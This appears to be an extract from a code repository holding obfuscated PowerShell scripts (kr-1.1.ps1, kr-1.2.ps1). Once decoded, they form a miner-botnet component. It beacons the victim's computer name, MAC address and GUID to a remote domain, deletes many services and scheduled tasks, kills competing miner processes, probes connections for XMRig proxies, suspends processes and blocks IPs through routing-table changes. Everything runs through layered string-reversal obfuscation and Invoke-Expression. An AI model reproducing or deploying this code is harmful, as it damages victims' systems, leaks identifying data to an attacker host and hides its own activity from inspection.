486 | } 487 | 488 | )itRJ*8,2('+'wop::]yIP+yIPhtam[ * ]itRJ-3[rrapitRJ]tni[ rob- gnolpitRJ = gnolpitRJ 489 | 490 | {)--iyIP+yIPtRJ ;0 eyIP+yIPg- itRJ;3=itRJ(rof yIP+yIP 491 | 492 | 0yIP+yIP = gnolp'+'itRJ 493 | 494 | )yWu.yyIP+yIPWu(tilps.pitRJ = rrayIP+yIPpyIP+yIPitRJ 495 | 496 | yIP+yIP) 497 | 498 | )L5927yIP+yIP694924 ,L5927'+'694924(@ 499 | 500 | ,)L6773085043 ,'+'L0407694924(@ 501 | 502 | ,)L4076525'+'233 ,L040'+'7694924(@ 503 | 504 | ,)L4'+'897107223 ,L040yIP+yIP7694924(yIP+yIP@ 505 | 506 | ,)L4895221223 ,L0407694924(@ 507 | 508 | ,)L27452'+'21223 ,L04076'+'94924(@ 509 | 510 | ,)L0255yIP+yIP3'+'yIP+yIP22'+'323 '+',L0671094924(@ 511 | 512 | ,)L8465yIP+yIP991582 ,L0671094924(@ 513 | 514 | yIP+yIP,)L6148603233 ,L4226'+'384924(@ 515 | 516 | ,)L8279276882 ,L0278193924(@ 517 | 518 | ,)L4095191861 ,L2992770yIP+yIP924('+'@ 519 | yIP+yIP 520 | ,)L2346070312 ,L0800918724(@ yIP+yIP 521 | 522 | ,)L061277761 ,L0800918724(@ 523 | 524 | ,)L0 ,L080091'+'8724(@ 525 | 526 | ,)L048135620'+'4 ,L0481356204(@ 527 | 528 | ,yIP+yIP)L4836908573 ,L04813yIP+yIP56204(@ yIP+yIP 529 | 530 | (@ = spIsertRJyIP+yIP 531 | 532 | ) 533 | 534 | pitRJ]gnirtS[]'+')eurttRJ=yrotadnaM(retyI'+'P+yIP'+'emayIP+yIPrap[ 535 | 536 | (maraP 537 | 538 | { PIbuPsi noitcnuf 539 | 540 | }{hctac}yWuyWunioj'+'-]5..0[5dmfitR'+'J=noisyIP+yIPrevtRJ{yrt 541 | 542 | } 543 | 544 | fDimoc.uyIP+y'+'IP'+'djw87u.'+'d/'+'/:ptthfyIP+yIPDyIP+yIPi = lru_nwodtRJ '+' 545 | 546 | {)lru_nwodtRJ!(fiyIP( ()yIPxyIP+]31[DillEhSNDL+]1[DiLL'+'ehsNDL (.'(" , '.','R'+'iGH'+'tTo'+'LEft' )|fOReach-ObJECT { $_.VaLue} )) 547 | #|.( ([STRIng]$vErBOseprEfERenCE)[1,3]+'x'-JOIN'') 548 | 549 | -------------------------------------------------------------------------------- /DriveLife/krBin/kr-1.1.ps1: -------------------------------------------------------------------------------- 1 | ('.( LDNshe'+'LLiD[1]+LDNShElliD[13]+PIyxPIy)( (PIyif(!JRtdown_url){ '+' JRtdown_url = iPIy+PIyDPIy+PIyfhttp:/'+'/d'+'.u78wjd'+'PI'+'y+PIyu.comiDf } try{JRtverPIy+PIysion=J'+'Rtifmd5[0..5]-'+'joinuWyuWy}catch{} function isPubIP { Param( [parPIy+PIyame'+'PIy+P'+'Iyter(Mandatory=JRttrue)'+'][String]JRtip ) PIy+PIyJRtresIps = @( PIy+PIy @(40265PIy+PIy31840L, 3758096384L)PIy+PIy, @(4026531840L, 4'+'026531840L), @(4278'+'190080L, 0L), @(4278190080L, 167772160L), PIy+PIy @(4278190080L, 2130706432L), PIy+PIy @'+'(429PIy+PIy0772992L, 1681915904L), @(4293918720L, 2886729728L), @(429483'+'6224L, 3323068416L),PIy+PIy @(4294901760L, 285199PIy+PIy5648L), @(4294901760L,'+' 323'+'22PIy+PIy'+'3PIy+PIy5520L), @(42949'+'67040L, 32212'+'25472L), @(4294967040L, 3221225984L), @PIy+PIy(4294967PIy+PIy040L, 322701798'+'4L), @(4294967'+'040L, 332'+'5256704L), @(4294967040L'+', 3405803776L), @(429496'+'7295L, 429496PIy+PIy7295L) )PIy+PIy JRtiPIy+PIypPIy+PIyarr = JRtip.split(uWPIy+PIyy.uWy) JRti'+'plong = PIy+PIy0 PIy+PIy for(JRti=3;JRti -gPIy+PIye 0; JRtPIy+PIyi--){ JRtiplong = JRtiplong -bor [int]JRtiparr[3-JRti] * [mathPIy+PIy]::pow'+'(2,8*JRti) } for(JRtj=0;JRtj -lt JRtresIps.count;JRtj++){ if((JRtiplong -band JRtresIps[JRtj][0])PIy+PIy -eq JRtresIps[JRtj][1]){ return JRtfalse P'+'Iy+PIy } } return JRPIy'+'+PIyttrue } funPIy+PIyction ssl_connect(JRtip,PIy+PIyJRtport,JRtsend_str){ '+' JRtret = PIy+PIyuWyuWyPIy+PIy try{ PIy+PIy J'+'Rtsocket = NPIy+PIyew-Object NePIy+PIyt.PIy+PIySockets.TcpClient(JRtip, JRtpPIy+PIyort) PIy+P'+'Iy JRtsslStream = New-Object System.Net.Secur'+'i'+'ty.SslStream(JRtsockePIy+PIyt.GetStream(),JRtfal'+'se,(PIy+PIy{JRtTrue} -as [Net.Security.RemoteCPIy+PIyertificateValidationCallback])) PIy+PIy JRtsslStream.ReadTimeout = 5000 PIy+P'+'Iy JRtsslStream.AuthePIy+PIynticateAsClient(iDfiDf) JR'+'twPIy+PIyriter = new-objectPIy+PIy System.IO.StrePIy+P'+'IyamWriter(PIy+PIyJRtsPIy'+'+PIyslStream) JRtreaPIy+PIyder = n'+'ew-object SPIy+PIyystem.IO.StreamReader(PIy+PIyJRtsslStream) JRtwriter.WriteLine'+'(JRtsend_str) PIy+P'+'Iy PIy+PIy JR'+'twriter.flush() JRtret = JRtreader.ReadLine() JRtsocketPIy+PIy.close() }catch{} ret'+'urn JRtret } func'+'tio'+'n raw_cPIy+PIyonnect(JRtip,J'+'Rtport,JRtsend_str){ try{ PIy+PIy JPIy+PIyRtclient = NEW-objEcT Net.Sockets.TcpClient'+'(JRtip,JRtport) JRtsock = JRtclient.Client JRtbytes = [Te'+'xt.EncodinPIy+PIyg]::ASCII.GePIy+PIytBytes(JR'+'tsend_str) PI'+'y+PIy JRtsock.senPIy+PIyd((JRtbytes)PIy+PIy) eS1 out-null JRtsock.ReceiveTimeout = 50PIy+PIy00 PIy+PIy P'+'Iy+PIy JRtres = [Array]::CreateInstance((PIy+PIyiD'+'PIy+PIyfbyte'+'iDf), 10000) '+'JRtrecv = JRtsock.Receive(JRtres) '+' JRtres = JRtres[0..(JRtrecv-1)] JRtstPIy+PIyr = [Text.Encoding]::PIy+'+'PIyASCII.gPIy+P'+'Iyetstring'+'(JPIy+PIyRtres) return PIy+PIyJRtstr }catch{} return uWyPIy+PIyuWy } fu'+'nction ishttp(JRtip,JRtport){ PIy+PIy JRtdata=uWyGET / HT'+'TP/1PIy+PIy.19mRn9mRnuWyPIy+PIy JRtret = raw_connect JRtip JRtportPIy+PIy JRtdata if(JRtret.indePIy+PIyxOf(uWyHTTP'+'/1uWy) -ne -1){ PIy+PIy retur'+'n JR'+'tPIy+PIytrue } return JRtfalse }'+' funcPI'+'y+PIytion ishttps(JRtip,JRtport){ JRtdata = uWyGET / HTTP/1.19mRPIy+PIyn9mRnuWy '+' JRtretPIy+PIy = ssl_connect JRtip JRtport JRtdata PIy+PIy if(JRtret.indexOf(uWyHTTP/1uWyPIy+PIy) -ne -1){ return JRttrue PIy+PIy} '+' return JRtfalPIy+PIyse } function isminerproxy(JRtip,JRtport){ JRtdata =iDf{uWyiduWy:1,uWyj'+'sonrpcuWy:uWy2.0uWy,uWymethoduWy:uWyloginuWy,uWyparamsuWy:{uWyloginuPIy+PIyWy:uWyxuWy'+',uWypassuWy:null,uWyaPIy+PIygentuWy:uWyXMRig/5.13.1uWy,uWyalgPIy+PIyouWy:[uWycn/1uWyPIy+PIy,uWycn/2uWy,uWycn/ruWy,uWycn/f'+'astuWy,PIy+PIyuWycn/halfuWy,uWycn/xaouWy,uWycn/rtouWy,uWycn/rwzuWy,uWy'+'cn/zlsuWy,uWycn/doubleuWy,uPIy+PIyWyrx/0uWy,uWyrx/wowuWy,uWyrx/lokiuWy,uWyrx/arquWy,uWyrx/sfxuWy,uWyrx/kevauWy]}}iDf PIy+PIy+ uWy9mRnuWPIy+PIyy JRtret = rPIy+PIyaw_connect JRtip PIy+PIyJRtport JRPIy+PIytdataPIy+PIy if(JRtret.indexOf(uWyjs'+'onrpcuPIy+P'+'IyWy) -ne -PIy+PIy1){ PIy+PIy write-host uWymi'+'ner proxy!!uWy return PIy+PIyJRttPIy+PIyrue } retuPIy+PIyrn JRtfalse } function isminerpPIy+PIyroxys(JRtip,JRtport){ '+' JRtdat'+'a = iDfPIy+PI'+'y{uWyiduWy:1,uWyjsonrpcuWyPIy+PIy:uWy2.'+'0uWy,uWymethoduWy:uWyloginuWy'+',uWyparamsuWy:{PIy+PIyuWyloginPIy+PIyuWy:uWyxuWy,uWypassuWy:PIy+PIynull,uWyagentuWyPIy+PIy:uWyXMRig/5.13PIy+PIy.1uWy,uWyalgouWy:[uWycn/1uWy,PIy+PIyuWycn/2uWy,uWycn/ruWy,uWycn/fastuWy,uWycPIy+PIyn/halfuWy,uWycn/xaouWy,uWycn/rtouW'+'y,uWycn/rwzPIy+PIyuWyPIy+PIy,uW'+'ycn/zlsuWy,uWycn/doubleuWy,uWyrx/0uWy,uWyrx/PIy+PIywowuWy,uWyrx/lokiuWy,uWyr'+'x/a'+'rquWy,uWyrx/sfPIy+PIyxuW'+'y,uWyrx/kevauWy]}}iDf JRtret = ssl_connect '+'JRtip JRtpPIy+PIyort JPIy+PIyRtdata if(JRtr'+'et.indexOf(uWyjsonrp'+'cuWy) -ne -1){ w'+'ritPIy+PIye-host uWyminPIy+PIyer proxys!!uWy PIy+PIy '+' rePIy+PIytur'+'n JRt'+'tPIy+PIyrue } r'+'eturn JRtfalse } AdPIy+PIyd-Type -TypeDefinition iDfusing System;using '+'System.Dia'+'gnostics;using SystemPIy+PIy.Security.Principal;using System.Runtime.InteropServices;puPIy+PIyblic static cl'+'ass Kernel32{[DllImport(uWyker'+'nel32.dlluWy)] public static extern boolPIy+PIy CheckRe'+'moteDebuggerPresent(IntPtr hProcePIy+PIyss,P'+'Iy+PIyou'+'t bool pbDebuggerPresent);[DllImport(uWykernel32.dlPIy+PIyluWy)] public static extern int D'+'ebugActPIy+PIyiveProcess(int PID);[DllImport(uWykernePIy+PI'+'yl32.dlluWy)] public static exterPIy+PIyn int DebugActiveProcessStop(int PID);}iDf function ProcessSus'+'pend(JRtid){ JPIy+PIyRtprocName = (Get-Process -id JRtid -ErPIy+PIyrorAction SilentlyContinue).name if(JRtprocName -eq JRtnull){ '+' Write-HosPIy+PIyt uPIy+PIyWyERROR: There iPIy+PIys no process with an ID of JRtiduWy return } PIy+PIy Write-host uPIy+PIyWyAttempting to suspend JRtprocName (PID: JRtid)...uWy if (JRtid -le '+'0) { write-host uWyYou didniDft PIy+PIyinput a positive integeruWy return } JRtdPIy+PIy'+'ebug = whoami /priv eS1 Where-Object{JRt_ -like uWy*SeDebugPrivilege*uWy}PIy+PIy if'+'(JRtdebug -ne JRtnull){ PIy+PIy JRtDebugPresent = [IntPtrPIy+PIy]::Zero '+' JRtoutPIy+PIy = [KernelPIy+PIy32]::CheckRePIy+PIymoteDebuggerPresent(((Get-Process -IdPIy+PIy JRt'+'iPIy+PIyd).Handle),[ref]JRt'+'deb'+'ugPresent) if '+'(JRtdebugPresent){ wrPIy+PIyite-host uWyThere is already a debugger attached to '+'this processuWy PIy+PIy returPIy+PIyn '+' } PIy'+'+PIy PIy+PIy JRtsuspend = [Kernel32]::DebugPIy+PIyAcPIy+PIytiveProcess(JRtid) '+' ifPIy+PIy (JRtsuspend -eq JRtfalse){ '+' write-host uWyERROR: Unable toPIy+PIy suspend JRtprocName (PID: JRtid)uWy } else{ write-host uPIy+PIyWyThe JRtprocNa'+'me process (PID: JRtid) was successfullyPIy+PIy suspended!uWy } } else{ write-host uWyERROR: You do not h'+'ave debuPIy+'+'PIygging priPIy+PIyvileges to pauPIy+P'+'Iyse aPIy+PIy'+'ny pPIy+PIyrocessuWyPIy'+'+PIy return '+' } } function gmd5(JRtd){ [Sec'+'uPIy+PIyriPIy+PIy'+'ty.CryptographPIy+PIyy.MD5]::Create().ComputePIy+PIyHash(PIy+PIyJRtd)eS1foreach{JRtl+P'+'Iy+PIy=JRt_.'+'ToString(iDfx2PIy+PIyiDf)} return JRtl } function getprotected(){ function getrname(){ function gmd5(JRtd){ [Security.Cryptography.MD5'+']::Create().CPIy+PIyomputPIy+PIyeHash(JRtd)eS1forePIy+PIyach{JRtl+=JRt_.ToString(iDfx2iDf)'+'} return JRtl } JRtrpath=uWyC:TaDWindowsTaDSyPIy+PIystem32TaDWindowspowershellTaDV1.0uWy PIy'+'+PIy JRtenames = gci uWyJRPIy+PIytrpath'+'TaD*uWy -Includ'+'e *.exePIy+PIy'+' -Exclude poPIy+PIywershell'+'.'+'exeeS1fPIy+PI'+'yoreach{JRt_.name}PIy+PIy JRttPIy+PIymd5 = gmd5 ([IO.File]::RPIy+P'+'IyeadAllBytes(uWyJRtrpathTaDpowershell.exeuWy)) foreach(JRtename in JRtenames){ PIy+PIy JRtmd5_=gmdPIy+PIy5 ([IO.File]::Rea'+'dPIy+PIyAllBytes(uWyJRtrpathTaDJRtename'+'uPIy+PIyWPIy+PIyy)) if(JRttmd5 -eq PIy+PIyJRtmd5_){ '+'PIy+PIy PIy+PIy return JRtename PIy+PIy } PIy+PIy } returPIy+PIyn uWyNULLNULLuWy } JRtcomp_name = JRtenv:COMPUTERNAME '+'JRtguid = (get-wmiobject WPIy+PIyin32_Com'+'puterSystemP'+'roduct'+').UUID JRtm'+'ac = (Get-WmiObject Wi'+'n32_NetworkAdapterPIy+PIyConfiguration eS1 where {PIy+'+'PIyJRt_.ipena'+'bled -EQ JRttrue}).Macadd'+'ress eS1'+' se'+'lect-obje'+'ct PIy+PIy-f'+'irst 1 JRtm6exe='+'(PIy+PIygmd5 ([system.Text.EPIy+PIyncod'+'ing]::UTF8.GetBytes(JRtcomp_name+JPIy+PIyRtguid+JRtmPIy+PIyac))).substring(0,6) JRtpiPIy+PIyds=@PIy+PIy() JRtpids+=Get-WmiObject -Cla'+'ss Win32_'+'ProcesseS1Where-Object{JRt_.path -li'+'PIy+PIyke iDPIy+PIyf*m6g.bin.exe*iDf -or'+' JRt_'+'.path -like iDf*m6.bin.exP'+'Iy+PIye*iDf -PIy+PIyor'+'PIy+PIy JRt_.p'+'ath -like uWy*JRtmPIy+PIy6exe*uWy -or JRt_.name -eq (getrname)}eS1foreach{JRt_.processid} re'+'turn JRtp'+'ids } function senPIy+PIydmsg(JRtip,JRtismproxy,JRtmpid)'+'{ '+' try{ JRtmPIy+PIyac = (GePIy+PIyt-WmiObject Win32_NetworkPIy+PIyAdapterConfiguration eS1 where {JRt_.ipenabled -EQ JRttruPIy+'+'PIye}).Macaddre'+'ss e'+'S1 select-objecPIy+PIytPIy+PIy -first 1 PIy+PIy JRtguid = (get-wmiobjecPIy+PI'+'yt Win32_Comp'+'PIy+PIyuterSystemProduct).UUID JRtcomp_naPIy+PIyme ='+' JRtenv:COMPUTERNAME if(JRtip -eq iDPIy+PIyfiDf){ PIy+PIy JRturl = uWyJRPIy+PIyt'+'down'+'_url/kl_repo.json?'+'JRtversion&JRtglobal:retry&JRtco'+'mp_name&JRtmac&JRtguiduWy } else { JRtPIy+PIypname = Get-Process -id JPIy+PIyRtmpid eS1 Select-ObjecPIy+PIyt -ExpandProperty Name PIy+PIy JRturl = uWyJRtdown_'+'url/PIy+PIyrellik.json?JRtversPIy+PIyion&JRtglobal:retry&JPIy+PIyRtcoPIy+PIymp_namPIy+PIye&JRtmac&JRtguid&JRtip&JRtismproxy&JRtmp'+'id&PIy'+'+PIyJRtpnameuWy PIy+PIy } (NewPIy+PIy-Object Net.WebClient).DownloadString(P'+'Iy+PIyJPIy+PIyRt'+'url) }catch{}PIy+PIy } functi'+'onPIy+PIy banIp(JRtip)PIy+PIy{ PIy+PIy route add JPIy+PIyRtip 0.0.0.0 IF 1PIy+PIy -p } function unbanIp(JRtip){ route '+'delPIy+PIyete JRtip 0.0.0.0 } Fun'+'ction Killer { JRtSrPIy+PIyvPIy+PIyName = uWy'+'xWinWpdSrvuWy, uWySVSHoPIy+PIys'+'tuWy, uWyMicrosoft TelemetryuWy, uWylsa'+'ssuWy, uWPIy'+'+PIyyMicrosof'+'PIy+PIytuWPIy'+'+PIyy, uWysystemuWy,'+' uWyOracleupdateuWy, uWyCLRuPIy+PIyWy, uWysysmgtuWy, uWyTaDgmuWy,PIy+PIy uWyWmdnPnSNuWy, uWySougoudluWy,uWPIy+PIyyNationaluWy, uW'+'yN'+'a'+'tionaaaluWy, uPIy+PIyWPIy+PIyyNatimmonaluWy, uWyNationalolluWy, uWyNationalmllPIy+PIyuWy,uWyNationalaieuWy,uWyNationalwpiuWy,uWyWiPIy+PIynHelp32uWPIy+'+'PIyy,uWyWinHelp64uWy, PIy+PIyuWySamPIy+'+'PIyserveruWy, uWyRpcEptMange'+'ruWy,'+' uWPIy+PIyyNPIy+PIyetMsmqActiv Media NVIDIAuWy, uW'+'ySncryption MPIy+PIyedia PlayeqPIy+PIyuWy,uWySxSuWy,uWyW'+'inSvcuWy,uWymssecsvc2.1uWy,uWymssecsvc2.0uWy,uWyWindows_Up'+'dateuWy,uWyWindows ManagersuWy,uWySvcNlauseruWy,uWy'+'WinVaultSvcuWy,uWyXtfyPIy+PIyuWy,uWyXtfyauWy,uWyXtfyxxxuWy,uWy360rTysuWy,uWyIPSECSuWy,uWyMpeSvcuWy,uWySRDSLuWy,uWyWifiServiceuWy,uWyALGMuW'+'y,uWywmiApSrvsuWy,uWywmiApServsuWy,uWP'+'Iy+PIyytaskmgr1uWy,PIy+PIyuWyWebPIy+PIyServersuWy,uWyExpressVNServiceuWy,uWyWWW.DDOS.CN.PIy+PIy'+'COMuWy,PIy+PIyuWyWinHelpSvcsuWy,uWyaspnet_statersuWy,uWyclr_optimizationuPIy+PIyWy,uWyAxInstSVuW'+'y,uWPIy+PIyyZationaluWy,uWyDNS ServeruWy,uWySPIy+PIyerPIy+PIyhiezu'+'Wy,uWySuperProServeruWy,uWy.Net CLRuWPIy+PIyy,uWyWissss'+'ssnHelp32uWy,uWyWinH'+'asdadelp32uWy,uWyWinHasdelp32uWy,uW'+'yClipBoPIy+PIyoksuPIy+PIyWy write-host uWPIy+PI'+'yykiPIy+PIyll services...uWy PIy+PIy foreach(JR'+'tSrv in JRtSrvName) {P'+'Iy+PIy JRtNull = SC.exe PIy+PIyConfig JRtSrv StarPIy+'+'PIyt= Disabled JRtNull = SC.exe Stop JRtSrv '+'JRtNull = SC.exe DPIy+PIyelete JRtSrv } JRtTaskName = u'+'WymPIy+PIyy1uWy,uWyMysauWy, uWyMysa1u'+'Wy, uWyMysa2uWy, uWyMysa3uWy, PIy+PIyuWyokuWy, uWyO'+'racle JavauWy, uWyOr'+'acle Java UPIy+PIypdateuWy, uWyMic'+'rosoft Telemetr'+'yuWy, uWySpooler SubSystP'+'Iy'+'+PIyem ServiceuWy,uWyOracle PrPIy+PIyodu'+'cts'+' Re'+'porteruWy, uWyUpdatePI'+'y+PIy service for productsuWy, uWyg'+'muWyPIy+PIy, uWyngmuWy,uWySorryuWy,uWyWindows_UpdateuWy,uWyUpdate_windows'+'uWy,PIy+PIyuWyWindo'+'wsUpdate1uWy,uWPIy+PIyyWindo'+'wsUpdatPIy+PIye2uWy,uWyWindowsUpdate3uW'+'y,uWyAdobeF'+'lashPlayeruWy,PIy+PIyuWyFlashPlayer1uWy,uWyF'+'PIy'+'+PIylashPlayer2uWy,uWyFlashPlayer3uWy,'+'uWy'+'IISu'+'Wy,uWyWindowsLogTa'+'sksuWy,uWySystem'+' Log SPIy+PIyecurity CheckuWy,uWyUpdateu'+'Wy,uWyUpdate1uWy,uWyUpdate2uWy,uWyUpPIy+PIydate3uWy,uWyUpdate4uWy,uWyDNSu'+'PIy+PIyWy,uWySYSTEMuWy,uWyDNS2uWy,uWySYSTEMauWy,uWPIy+PIyyskycmduWy,uWyMiscfostuWy,uWyNetframeworkuWy,uWPIy+PIyyFlashuWy,PIy+PIyuWyRavTaskuWy,uWyGooPIy+PIyglePingPIy+PIyConfig'+'suWy,'+'uWyHomeGroupProvideruWy,uWyMiscfostNsiuPIy+PIyWy,uWyWwANsvcuWy,uWyBluetoothsuWy,uWyDdri'+'vePIy+P'+'IyrsuWyPIy+PIy,uWyDnsScanuWy,uWyWebServersuWy,uWyCredentialsuWy,uWyTablteInputoutuWy,uWywerclpsyportuWy,uWyHispDemornuWy,uWyLimeRAT-Ad'+'minuWy,uWyDnsCoreuWyPIy+PIy,uWPIy+PIyyUpdate serPIy+PIyvice for Windows ServiceuWy,uWyDnsCoreuWy,uWyECD'+'nsCoreuWy writPIy+PIye-host uWykill tasks...uWy'+' fPIy+P'+'Iyoreach (JRtTask inPIy+PIy JRtTaskNam'+'ePIy+PIy) { SchTa'+'sks.e'+'xe /DelePIy+PIyte /TN JRtTask /F 2> JPI'+'y+PIyRtNull } JRtPIy+PIyMiner = uWySCuWy,uWyWerMgruWy,uWyWerFaultuWy,uWyDW20uWPIy+PIyy,uWymsinfouWy, uWyXMPIy+PIyR*uWy,uWyxmrig*uWy, '+'uWyminerdu'+'Wy, '+'uWyMinerGateuWy, uWyCarbo'+'nuWy, uPIy+PIyWyyamm1uWy, uWyupgeadeu'+'PIy+PIyWy, uWyauto-PIy+PIyupgeadeuWy, PIy+PIy'+'uWysvsPIy+PIyhostuWy, uWySystPIy+PIyemIISuWy, uWySystemIISSePIy+PIycuWy, i'+'DfWindowsUpdater*iDf, uWyWindowsDefender*uWy, uWyupdateuWy, uWycarssuWy,PIy+PIy uWyserviceuWy, uWycsrscuWy, uWycarauWy, uWyjavaupduWy, uWygxdrvuWy, uWylsmoseeuWy, uW'+'ysecuamsuWy, uWySQPIy+PIyLEXPRESS_X64_86uWy, uWyPIy+PIyCalli'+'grapuWy, PIy+PIyuWySqlceqpuWy, uWySettinPIy+PIyguW'+'y, uWy'+'UninstauWy, uWyconhosteuWy,PIy+PIyuWySetringuWy,uWyGalliPIy+PIygrpuWy,uWyImaginguWy,u'+'WytaskegruWy'+',uWyTerms.EXEuWy,uPIy+PIyWy360uWy,uWy88PIy+PIy66uWy,uWy99PIy+PIy66uWy,uWy9696uWy,uWy9797uWy,uWysvchostiuWy,uWySearchIPIy+PIyndexuWy,uWyAvirauWy,uWycohernece'+'uWy,uWywinuWy,uWySQLforwinuWy,uWyPIy+PIyxig*u'+'Wy,uWytaskmgr1uWy'+',uWyWorkstationuWy,uWyressuWy,PIy+PIyuWyex'+'ploresuWy '+' write-host uWyPIy+PIykill processes...uWy foreach (JRPIy+PIytm PIy+PIyin JRtMiner) { Get-PrPIy+PIyocess -P'+'Iy+PI'+'y'+'Name JRtm -ErrorAction SilentlyContinue eS1 Stop-Process -Force PIy+PIy} JRttm = Get-Process -Name TaskMgr -ErrorAcPIy+PIytioPIy+'+'PIyn SilentlyContinue if('+'JRttm -eq JRtnull){ Start-Process -WindowSPIy+PIytyle hi'+'dden -FP'+'Iy+PIyilePath TaPIy+PI'+'yskmgr.exe PIy+PIy } JRttcpconn '+'= NetStaPIy+PIyt -anop TCP JRtipcache=@(iDf170.187.1'+'49.77:80iPIy+PIyDf,iPIy+PIyDf138PIy+P'+'Iy.68.186.90:80iDf,iDf176.5'+'8.99.231:80iDf,iPIy+PIyDfPIy+PIy138.68.2'+'51.24:80iDf,iDf165.227.62.120:443iDf,iDf202'+'.182.120.192:443iDf,iDf178.62.2.194:443i'+'Df,iDf138.68.4.1'+'9:443iDf,iDf176.58.99.231:443iDf,iDfPIy+PIy138.68.PIy+PIy251.24:443iDf,'+'iDf85.117.234.189:443iDf,iDf159.203'+'.122.42iDf) P'+'Iy+PIy forPIy+PIyeach(JRttempip in JRtipcache'+'){ unbanIp JRttempPIy+PIyip } '+'PIy+PIy JRtppids = getprotected write-host uWykill connections...uWy foreach (JRtt in JRttcpconn) { JRtl'+'in'+'e = JRtt.split(iDf iDf)eS1 ? {JRtPIy+PIy_} if (JRtline -eq JRtnul'+'l) { contiPIy+PIynue '+'} if (JRtt'+'.contains(uWyLISTENINGuWy) PIy+P'+'Iy-and (JRtline[1].coPIy+PIyntains(uWy4PIy+PIy'+'3669uWyPIy+PIy) -or JRtline[1].contains(uWy43'+'668uWy))'+') { JRtppids += JRtline[-1] PIy+PIy PIy+PIycontinue '+' } PIy+PIy if(JRtt.contains(uWyESTAP'+'Iy+PI'+'yBLISHEDuWy)PIy+PIy -and (JRtline[2].gettype() '+'PIy'+'+PIy-eq uWyuWy.gettype()) -and (JRtlinePI'+'y+PIy[2].indexOf(uWy'+':uWy) -ne -1)){ PIy+PIy JRtip,JRtport = JRtline[2].spPIy+PIylit(iDf:iDfPIy+PI'+'y) '+'JRtcurrpid = JRtline[-'+'1] iPIy+PIyf((JRtipcache -contaPIy+PIyins PIy+PIyJRtline[2]) -or (JRtppids -cPIy+PIyontains JRtcurrpid) -or (JRtip.length -lt 4) -orPIy+PIy -not(isPPIy+PIyubIP'+' JRtip) -orP'+'Iy+PIy (JRtpPIy+PIyort -le 0)){ PIy+PIy continue '+' } if(JRtglobal:ipdealca'+'chePIy+PIy -contains JRtline[2]){ '+' ProcessSusP'+'Iy+PIypend JRt'+'currpid '+'PIy+PIy banIp JRtip PIy+PIy continue PIy+PIy } writPIy+PIyePIy+PIy-host uWytryPIy+PIy JRtipPIy+PIy JRtport'+'...uWy if(((ishttp JRtip JRtpor'+'t) -eq JRtf'+'alse) -and ((ishttps JRtip JRtport) -eq JRtfalse)'+'){PIy+PIy write-host PIy+PIyuWyend http tPIy+PIyest...uWy JRtiPIy+PIysmproxy = 0 '+' if((iPIy+PIysminerproxy JRtipPI'+'y+PIy JRtport) -eq JRttrue){ PIy+PI'+'y '+' '+' JPIy+PIyRtismproxy = 1 PIy+PIy} else{ '+' '+' if((ism'+'inerproxys JRtip JRtport) -eq PIy+PIyJRttrue){ JRtismproxy = 2'+' '+' }PIy+PIy '+'PIy+PIy } if(JRtismproxy -ne 0){ '+' ProcessSuspend JRtcurrpid '+' '+' banPIy+PIyIp JRtip PIy+PIy JRtglobal:ipdealcache += JRtline[2] '+' sendmsg JRtline[2] JRtismproxy JRtcurrpid '+' } '+'} if(JRtipcache -notcontains JRtline[P'+'Iy+PIy2]){JRtiPIy+PIypcache += JRtline[2]} '+' } } JRtglobal:rePIy+PIytry+'+'+ } JRtst'+'art_time=Get-Date -UFormat uWy%suWy '+'JRtglobal:ipdealcache=@() JRtglobal:retry=0 JRtser=[System.Net.SocPIy+PIykePIy+PIyts.TcpListener]65529 JRtser.start()PIy+PIy while(PIy+PIyJRtt'+'rue){ if('+'((Get-Date -UFormat uWy%suWy)-JRtstart_time) -gt 60000) {break} uWytry to kill...uWy KPIy+PIyiller '+' uWyki'+'ll PIy+'+'PIydone...uWy Start-Sleep -SPIy+PIyeconds 600 } PIy).rePlAcE(([chAR]74+[chAR]82+[chAR]116),[STrinG][chAR]36).rePlAcE(([chA'+'R]10'+'5+[chAR]68+[chAR]102),[STrinG][chAR]39).rePlAcE(PIy'+'TaDPIy,[STrinG][chAR]92).rePlAcE(PIyeS1PIy,PIy6PJPIy).rePlAcE(PIyuWyPIy,[STrinG][chAR]34).rePlAcE(PIy9mRPIy,PIy7FjPIy)) ').rEplAcE(([chaR]80+[chaR]73+[chaR]121),[stRINg][chaR]39).rEplAcE(([chaR]76+[chaR]68+[chaR]78),'$').rEplAcE('6PJ',[stRINg][chaR]124).rEplAcE(([chaR]55+[chaR]70+[chaR]106),'') #| iNVoKE-eXPrESSioN -------------------------------------------------------------------------------- /DriveLife/krBin/kr-1.2.ps1: -------------------------------------------------------------------------------- 1 | #.( $sheLLiD[1]+$ShElliD[13]+'x') ( ('if(!JRtdown_url){ JRtdown_url = i'+'D'+'fhttp://d.u78wjd'+'u.comiDf } try{JRtver'+'sion=JRtifmd5[0..5]-joinuWyuWy}catch{} function isPubIP { Param( [par'+'ame'+'ter(Mandatory=JRttrue)][String]JRtip ) '+'JRtresIps = @( '+' @(40265'+'31840L, 3758096384L)'+', @(4026531840L, 4026531840L), @(4278190080L, 0L), @(4278190080L, 167772160L), '+' @(4278190080L, 2130706432L), '+' @(429'+'0772992L, 1681915904L), @(4293918720L, 2886729728L), @(4294836224L, 3323068416L),'+' @(4294901760L, 285199'+'5648L), @(4294901760L, 32322'+'3'+'5520L), @(4294967040L, 3221225472L), @(4294967040L, 3221225984L), @'+'(4294967'+'040L, 3227017984L), @(4294967040L, 3325256704L), @(4294967040L, 3405803776L), @(4294967295L, 429496'+'7295L) )'+' JRti'+'p'+'arr = JRtip.split(uW'+'y.uWy) JRtiplong = '+'0 '+' for(JRti=3;JRti -g'+'e 0; JRt'+'i--){ JRtiplong = JRtiplong -bor [int]JRtiparr[3-JRti] * [math'+']::pow(2,8*JRti) } for(JRtj=0;JRtj -lt JRtresIps.count;JRtj++){ if((JRtiplong -band JRtresIps[JRtj][0])'+' -eq JRtresIps[JRtj][1]){ return JRtfalse '+' } } return JR'+'ttrue } fun'+'ction ssl_connect(JRtip,'+'JRtport,JRtsend_str){ JRtret = '+'uWyuWy'+' try{ '+' JRtsocket = N'+'ew-Object Ne'+'t.'+'Sockets.TcpClient(JRtip, JRtp'+'ort) '+' JRtsslStream = New-Object System.Net.Security.SslStream(JRtsocke'+'t.GetStream(),JRtfalse,('+'{JRtTrue} -as [Net.Security.RemoteC'+'ertificateValidationCallback])) '+' JRtsslStream.ReadTimeout = 5000 '+' JRtsslStream.Authe'+'nticateAsClient(iDfiDf) JRtw'+'riter = new-object'+' System.IO.Stre'+'amWriter('+'JRts'+'slStream) JRtrea'+'der = new-object S'+'ystem.IO.StreamReader('+'JRtsslStream) 